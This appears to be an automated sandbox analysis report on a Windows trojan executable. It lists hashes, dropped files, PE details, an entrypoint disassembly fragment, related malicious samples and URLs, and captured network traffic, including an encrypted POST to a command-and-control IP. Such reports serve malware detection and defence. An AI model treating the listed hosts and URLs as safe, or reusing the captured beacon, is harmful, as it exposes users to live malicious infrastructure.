	Outstanding Invoices.doc	Get hash	malicious	Browse	79.172.249.82
	http://okomekai.symphonic-net.com/Invoice-69070770/	Get hash	malicious	Browse	79.172.249.82
	Outstanding invoice.doc	Get hash	malicious	Browse	79.172.249.82
	Outstanding invoice.doc	Get hash	malicious	Browse	79.172.249.82
	Informationen #018612525.doc	Get hash	malicious	Browse	79.172.249.82
	Informationen #018612525.doc	Get hash	malicious	Browse	79.172.249.82
	http://www.nzbodytalk.org.nz/INCORRECT-INVOICE/	Get hash	malicious	Browse	79.172.249.82
	mail.rodolfogvalencia.com/Invoice/	Get hash	malicious	Browse	79.172.249.82
LINODE-APLinodeLLCUS	pitEBNziGR.exe	Get hash	malicious	Browse	173.230.145.224
	aEdlObiYav.exe	Get hash	malicious	Browse	45.33.54.74
	1m7388e48E.exe	Get hash	malicious	Browse	45.79.26.231
	4849708PO # RMS0001.exe	Get hash	malicious	Browse	45.79.19.196
	SecuriteInfo.com.Trojan.Kronos.21.31435.exe	Get hash	malicious	Browse	139.162.210.252
	Z8bln2YPEw.exe	Get hash	malicious	Browse	96.126.101.20
	yxQWzvifFe.exe	Get hash	malicious	Browse	96.126.123.244
	Purchase _Order-EndUer#99849959.Pdff.exe	Get hash	malicious	Browse	139.162.21.249
	Private document.docm	Get hash	malicious	Browse	139.162.187.154
	p.o_015299.exe	Get hash	malicious	Browse	104.237.142.196
	p.o_015299.exe	Get hash	malicious	Browse	104.237.142.196
	2ojdmC51As.exe	Get hash	malicious	Browse	172.104.97.173
	po#521.exe	Get hash	malicious	Browse	104.237.142.196
	GBv66BGS05.exe	Get hash	malicious	Browse	45.79.222.138
	unpacked.exe	Get hash	malicious	Browse	172.104.179.220
	E-CONTACT_FORM.html	Get hash	malicious	Browse	74.207.250.131
	page.exe	Get hash	malicious	Browse	172.104.225.210
	page.exe	Get hash	malicious	Browse	172.104.225.210
	Private file #8545210.xls	Get hash	malicious	Browse	172.104.151.179
	SecuriteInfo.com.Heur.5671.xls	Get hash	malicious	Browse	176.58.123.25

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.598865677794713
Encrypted:	false
SSDEEP:	6:bz4/ek1GaD0JOCEfMuaaD0JOCEfMKQmD11Al/gz2cE0fMbhEZolrRSQ2hyYIIT:bUlGaD0JcaaD0JwQQfAg/0bjSQJ
MD5:	E7EFECD50AA9A83F3D3C7E9ACCDDD359
SHA1:	37350B1F4AFE62BDF55850C24C441CCA4629C1B9
SHA-256:	4A83CB9AE054EC303A5E1949663DFE927B6421326F436FD3F65DF8076DBE706E
SHA-512:	5FFB81280E6D3A4C64558B01F07658F3D11F6AFCE57C9E7461E89E505961EB96C7DB69D56E49AD6C795984BCD88CE7A1D194610D811FD17C0B0E92E9FCE52D8D
Malicious:	false
Preview:	....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xae08ab15, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09604349913320583
Encrypted:	false
SSDEEP:	6:dczwl/+F8RIE11Y8TRXUbZlz4c6/qKPczwl/+F8RIE11Y8TRXUbZlz4c6/qK:20+F8O4blqd4DyK00+F8O4blqd4DyK
MD5:	45A7D361E6BE966EF00C50179C87DFD1
SHA1:	0D8B0BD02382DECDFD87FFF6EC8C11E703DC9033
SHA-256:	DA147CF1EA2A9634B512C6895D932FC3B0D088B98595A9E9F62DD05351C4714C
SHA-512:	BA166A2877337EE6D6270D4C0F2800E6783C4936346F073977757AC3DDED05C78C8B590703E5A2C2078B1F867A01BFCDF86B8CE3F80CB68FE5D5A4CB08A2AC17
Malicious:	false
Preview:	....... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................\|`?......y.i.................y......y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.11037306813174995
Encrypted:	false
SSDEEP:	3:VqL9EvsPY/t+uXl/bJdAti664c6llill:BsKt+At4I4c6/G
MD5:	08B59EC1426E11E3862C1059C7F1DA73
SHA1:	5C4B310E095883DA058EB75633E481EE9CBEBC77
SHA-256:	1C44305B9E765CB1683F106EDF427C4A705D2AE1674F478D6348734E21D40E4E
SHA-512:	CE02CA0F7CD406C538206BB742C1174C50E8E4F64AB2A083F93F5FCE8C6F4316F0782B557242AB1A37F46BD364BDE778AA5B0FC0404DEB9F075F33F1A1F3A8DA
Malicious:	false
Preview:	.........................................3...w.......y.......w...............w.......w....:O.....w...................y......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.10983339019027133
Encrypted:	false
SSDEEP:	12:266lUEjXm/Ey6q9995O+4Nq3qQ10nMCldimE8eawHjcclRf:266gl68w6LyMCldzE9BHjccb
MD5:	D868DDA20565EC23332BF2B948D4CE61
SHA1:	FF776135F2E480A6BE50F1421B4AA724968F173E
SHA-256:	F0101E5A2961BE8D3A00478A9FD88A9D7025C17F68284A03F9875201CD43FCD7
SHA-512:	2AB8B7178C733246AECACA50FBF85A759A8949CA7F9AAFAC85B249EE29359139E984D54F09DAF1361E5DB8C71F494799FAD0039EE40B71B24A30E1024F05816E
Malicious:	false
Preview:	....................................................................................l............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................,.-..... .....w.G..#..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.....l...........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11246336196645974
Encrypted:	false
SSDEEP:	12:ul6jXm/Ey6q9995O+wA1miM3qQ10nMCldimE8eawHza1miIFl5P:uBl68wy1tMLyMCldzE9BHza1tIFH
MD5:	4182208113025B9D88AE9581BB0E64BA
SHA1:	288AE4CA303EF47E6BBA968E9D9AE13CF5F09399
SHA-256:	7E88776A2D20B0A3673BA6C3E85481160B17F3FBD91FA7F8BEFA0E9150E421B7
SHA-512:	BE01F432C8EF33C257B4B045A061CE143CDFE0832341FDD2D6EE4386C405A1F68D1511B9F25027824EFEF3E2C7773F50EF649F87B775D5019B3C1EEE90E87866
Malicious:	false
Preview:	....................................................................................l............................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................,.-..... .......@..#..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.....l...j.......................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.11231097187605824
Encrypted:	false
SSDEEP:	12:ulucjXm/Ey6q9995O+OH1mK2P3qQ10nMCldimE8eawHza1mKWl+26P:uKl68wr1iPLyMCldzE9BHza1aXa
MD5:	534C2DF42E6D380E8712EAA2313F4139
SHA1:	682E336DDCEAB02FA24E85727CBBEBAD6590E222
SHA-256:	F79893052DD34962F4E2FDE673C77611B7C2D07BE123A8BFD858C1169627E15F
SHA-512:	77267D37EC101548C9BB765244B81596C6C0A3D43EE908B5DE039835CF91962CA8F074D4A73DA36CB41BFD99CFFA3D71A61108101E74864AA8E4612FD76E2B0A
Malicious:	false
Preview:	....................................................................................l....J.......................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1.............................................................,.-..... .....i~9..#..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P.....l...}X......................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.1399903113199676
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rZ0t9k9+MlWlLehB4yAq7ejC40t8:OaqdmuF3rZ+kWReH4yJ7ML
MD5:	51040ECA59767C6B8AE098750B7D937E
SHA1:	6A84B450A6C8E04DD34EBC4CB9B2B2F256175E2D
SHA-256:	28F5D161F4ADEE51F46EC4966F9A0033EC4C7D51394C906C7808DDE98636D5D3
SHA-512:	439B5F27804B8EBCB80D74274E5B8F452118E0C306815151F0D2C354703D181FE2D5DB17716D74DB91B3D8D5CF051913536E32058801A70C414C53925AF19433
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. S.a.t. .. M.a.r. .. 2.7. .. 2.0.2.1. .2.3.:.3.2.:.2.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. S.a.t. .. M.a.r. .. 2.7. .. 2.0.2.1. .2.3.:.3.2.:.2.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.436116781781946
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0HvIGwMmBV.exe
File size:	45568
MD5:	ecbc4b40dcfec4ed1b2647b217da0441
SHA1:	e08eb07c69d8fc8e75927597767288a21d6ed7f6
SHA256:	878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
SHA512:	3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
SSDEEP:	768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x409ee0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	4cfe8bbfb0ca5b84bbad08b043ea0c87

Entrypoint Preview

Instruction
push esi
push 0040C1F0h
push 3966646Ch
push 00000009h
mov ecx, D22E2014h
call 00007F4820F2F28Eh
mov edx, 004011F0h
mov ecx, eax
call 00007F4820F2F1B2h
add esp, 0Ch
mov ecx, 8F7EE672h
push 0040C0D0h
push 6677A1D2h
push 00000048h
call 00007F4820F2F269h
mov edx, 004010D0h
mov ecx, eax
call 00007F4820F2F18Dh
add esp, 0Ch
push 08000000h
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C10Ch]
mov esi, eax
test esi, esi
je 00007F4820F375C8h
push 08000000h
push 00000000h
push esi
call dword ptr [0040C1F8h]
add esp, 0Ch
push esi
push 00000000h
call dword ptr [0040C1A8h]
push eax
call dword ptr [0040C1E8h]
call 00007F4820F2EBEAh
push 00000000h
call dword ptr [0040C1ACh]
pop esi
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, edx
mov dword ptr [ebp-0Ch], ecx
mov esi, 00000001h
mov dword ptr [ebp-08h], esi
mov eax, dword ptr [edi]
cmp eax, 7Fh
jbe 00007F4820F375B1h
lea ecx, dword ptr [ecx+00h]
shr eax, 07h
inc esi
cmp eax, 7Fh

Rich Headers

Programming Language:

[LNK] VS2013 UPD4 build 31101
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbad0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd000	0x5cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9883	0x9a00	False	0.503297483766	data	6.45508103349	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0xb2e	0xc00	False	0.160807291667	data	4.23495809712	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0xbd8	0x200	False	0.123046875	data	0.91267432928	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc	0xd000	0x5cc	0x600	False	0.8671875	data	6.49434732961	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
KERNEL32.dll	WTSGetActiveConsoleSessionId

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2021 23:30:48.995193958 CET	49708	443	192.168.2.3	79.172.249.82
Mar 27, 2021 23:30:49.046521902 CET	443	49708	79.172.249.82	192.168.2.3
Mar 27, 2021 23:30:49.046778917 CET	49708	443	192.168.2.3	79.172.249.82
Mar 27, 2021 23:30:49.048682928 CET	49708	443	192.168.2.3	79.172.249.82
Mar 27, 2021 23:30:49.099796057 CET	443	49708	79.172.249.82	192.168.2.3
Mar 27, 2021 23:30:49.100187063 CET	443	49708	79.172.249.82	192.168.2.3
Mar 27, 2021 23:30:49.100219011 CET	443	49708	79.172.249.82	192.168.2.3
Mar 27, 2021 23:30:49.100351095 CET	49708	443	192.168.2.3	79.172.249.82
Mar 27, 2021 23:30:49.100385904 CET	49708	443	192.168.2.3	79.172.249.82
Mar 27, 2021 23:30:49.100776911 CET	49708	443	192.168.2.3	79.172.249.82
Mar 27, 2021 23:30:49.152527094 CET	443	49708	79.172.249.82	192.168.2.3
Mar 27, 2021 23:31:19.443156958 CET	49720	8080	192.168.2.3	193.169.54.12
Mar 27, 2021 23:31:22.441243887 CET	49720	8080	192.168.2.3	193.169.54.12
Mar 27, 2021 23:31:28.441834927 CET	49720	8080	192.168.2.3	193.169.54.12
Mar 27, 2021 23:32:10.457854033 CET	49729	8080	192.168.2.3	173.230.145.224
Mar 27, 2021 23:32:13.461190939 CET	49729	8080	192.168.2.3	173.230.145.224
Mar 27, 2021 23:32:19.477286100 CET	49729	8080	192.168.2.3	173.230.145.224

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 27, 2021 23:30:35.136806011 CET	51281	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:35.185703039 CET	53	51281	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:36.392592907 CET	49199	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:36.441457033 CET	53	49199	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:39.482014894 CET	50620	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:39.528275967 CET	53	50620	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:40.900351048 CET	64938	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:40.949657917 CET	53	64938	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:41.922178030 CET	60152	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:41.968491077 CET	53	60152	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:42.886928082 CET	57544	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:42.932985067 CET	53	57544	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:43.822658062 CET	55984	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:43.871591091 CET	53	55984	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:44.973901987 CET	64185	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:45.020015001 CET	53	64185	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:45.916902065 CET	65110	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:45.963110924 CET	53	65110	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:46.942543983 CET	58361	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:46.988715887 CET	53	58361	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:47.862416983 CET	63492	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:47.908565044 CET	53	63492	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:49.021703959 CET	60831	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:49.071114063 CET	53	60831	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:49.978348970 CET	60100	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:50.034267902 CET	53	60100	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:51.133941889 CET	53195	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:51.182661057 CET	53	53195	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:52.009537935 CET	50141	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:52.058372974 CET	53	50141	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:52.771023989 CET	53023	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:52.819793940 CET	53	53023	8.8.8.8	192.168.2.3
Mar 27, 2021 23:30:53.704035044 CET	49563	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:30:53.751549959 CET	53	49563	8.8.8.8	192.168.2.3
Mar 27, 2021 23:31:09.022572041 CET	51352	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:31:09.071551085 CET	53	51352	8.8.8.8	192.168.2.3
Mar 27, 2021 23:31:12.323043108 CET	59349	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:31:12.379441023 CET	53	59349	8.8.8.8	192.168.2.3
Mar 27, 2021 23:31:44.038686991 CET	57084	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:31:44.086756945 CET	53	57084	8.8.8.8	192.168.2.3
Mar 27, 2021 23:31:46.780510902 CET	58823	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:31:46.841824055 CET	53	58823	8.8.8.8	192.168.2.3
Mar 27, 2021 23:32:18.386431932 CET	57568	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:32:18.432691097 CET	53	57568	8.8.8.8	192.168.2.3
Mar 27, 2021 23:32:19.315408945 CET	50540	53	192.168.2.3	8.8.8.8
Mar 27, 2021 23:32:19.379103899 CET	53	50540	8.8.8.8	192.168.2.3

HTTP Request Dependency Graph

79.172.249.82:443

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49708	79.172.249.82	443	C:\Windows\SysWOW64\servicerpc.exe

Timestamp	kBytes transferred	Direction	Data
Mar 27, 2021 23:30:49.048682928 CET	341	OUT	POST / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 79.172.249.82:443 Content-Length: 436 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 55 ff 81 f4 3c 3e db 1c c7 ff 05 5a a4 b7 5b 07 2e 23 72 5c d4 c8 58 ec 10 36 28 11 ae 73 c1 bb 42 39 6a 0a 82 93 bd cc c1 28 e0 a7 96 e0 9f 76 ba 44 a1 c0 f0 73 87 32 d2 ba c9 da 8f 42 d9 77 a2 c6 5f c0 0b a0 17 c2 90 96 3f 20 06 b5 09 84 3a 8d 03 78 29 48 64 51 0f dd ef a4 ce 32 7f 10 f9 ac 6e fc a2 85 7e 64 b6 1e a6 35 e2 64 c6 7e 7e c1 8b 97 83 89 2f 35 3c af 8e 40 d1 a8 55 fe 68 d2 6d 14 f4 a6 21 99 c7 a3 8d 9d f1 2b e7 59 fe 32 13 6d de 56 d5 a9 7e 73 ff 2d 6a 16 77 90 4e 93 0b 8a de 85 32 19 f0 84 fb fe a3 ed 8e 05 b7 77 6a 81 6b 60 59 30 4e 89 ee 96 19 99 83 00 6a a5 ac d5 cb e8 1d 82 c1 ae d2 30 61 d7 b8 82 6f 43 c1 d6 33 6e 47 9f 3a 93 ad a8 5a df 17 21 79 b4 a7 69 c5 7f b4 80 61 1c 88 fa 3a df 3c 67 f9 26 8d 83 43 e3 bb 00 02 48 f0 86 07 e7 3e c0 d6 d4 35 c0 00 28 c3 f2 7c 70 38 f2 d1 95 c2 32 cc 4c 67 f7 a3 57 7d c6 03 7d 7b 71 03 5c 15 be d6 ab 07 da d5 ed 9a 41 07 d3 8c 28 21 3b 6a 1a f7 4c 58 7b 0a 87 b3 0e 28 54 38 6a 06 93 ef db 32 e2 25 ff b4 5c ee c5 27 99 39 c7 0a c7 60 2b 24 a4 9e ce 7c 19 f6 30 5f 74 6d 94 3c 98 05 e9 be 78 5e bd c8 51 03 b8 c0 a6 6c 54 aa b0 83 c6 f9 77 ee f7 10 40 e3 f8 6e 63 07 e4 3f c0 71 b4 4d 73 e0 e5 c8 db 2c 66 b7 af 00 6e 88 40 8d 68 0b 71 a4 a8 4b 12 ea f3 6a 5e 8b 1f 21 ec f8 54 e0 28 9a dc 3f 54 81 e6 b6 e2 26 9d 96 31 a1 70 dd 1a 23 6f Data Ascii: U<>Z[.#r\X6(sB9j(vDs2Bw_? :x)HdQ2n~d5d~~/5<@Uhm!+Y2mV~s-jwN2wjk`Y0Nj0aoC3nG:Z!yia:<g&CH>5(\|p82LgW}}{q\A(!;jLX{(T8j2%\'9`+$\|0_tm<x^QlTw@nc?qMs,fn@hqKj^!T(?T&1p#o
Mar 27, 2021 23:30:49.100187063 CET	342	IN	HTTP/1.1 400 Bad Request Date: Sat, 27 Mar 2021 22:30:49 GMT Server: Apache/2.4.25 (Debian) Content-Length: 362 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that 